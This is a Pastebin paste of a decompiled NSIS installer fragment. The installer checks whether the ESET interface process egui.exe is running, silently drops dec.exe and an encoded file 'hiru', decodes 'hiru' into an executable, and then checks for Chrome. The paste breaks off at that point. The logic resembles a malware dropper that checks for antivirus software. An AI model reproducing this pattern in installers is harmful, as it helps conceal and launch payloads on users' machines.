Advertisement
Guest User

Untitled

a guest
Jan 11th, 2019
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Function .onInstSuccess
  2.   IfSilent label_1135
  3.   HideWindow
  4.   StrCmp $_0_ 1 0 label_1128
  5.   nsProcess::_FindProcess /NOUNLOAD egui.exe
  6.     ; Call Initialize_____Plugins
  7.     ; SetOverwrite off
  8.     ; File $PLUGINSDIR\nsProcess.dll
  9.     ; SetDetailsPrint lastused
  10.     ; Push egui.exe
  11.     ; CallInstDLL $PLUGINSDIR\nsProcess.dll /NOUNLOAD _FindProcess
  12.   Pop $R0
  13.   StrCmp $R0 0 0 label_1035
  14.   Goto label_1128
  15. label_1035:
  16.   SetOverwrite on
  17.   File $PLUGINSDIR\dec.exe
  18.   File $PLUGINSDIR\hiru
  19.   SetOutPath $PLUGINSDIR
  20.   nsExec::Exec "$\"$PLUGINSDIR\dec.exe$\" hiru exe"
  21.     ; Call Initialize_____Plugins
  22.     ; SetOverwrite off
  23.     ; File $PLUGINSDIR\nsExec.dll
  24.     ; SetDetailsPrint lastused
  25.     ; Push "$\"$PLUGINSDIR\dec.exe$\" hiru exe"
  26.     ; CallInstDLL $PLUGINSDIR\nsExec.dll Exec
  27.   nsProcess::_FindProcess /NOUNLOAD chrome.exe
  28.     ; Call Initialize_____Plugins
  29.     ; AllowSkipFiles off
  30.     ; File $PLUGINSDIR\nsProcess.dll
  31.     ; SetDetailsPrint lastused
  32.     ; Push chrome.exe
  33.     ; CallInstDLL $PLUGINSDIR\nsProcess.dll /NOUNLOAD _FindProcess
  34.   Pop $R0
  35.   StrCmp $R0 0 0 label_1051
  36.   Goto label_1090
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement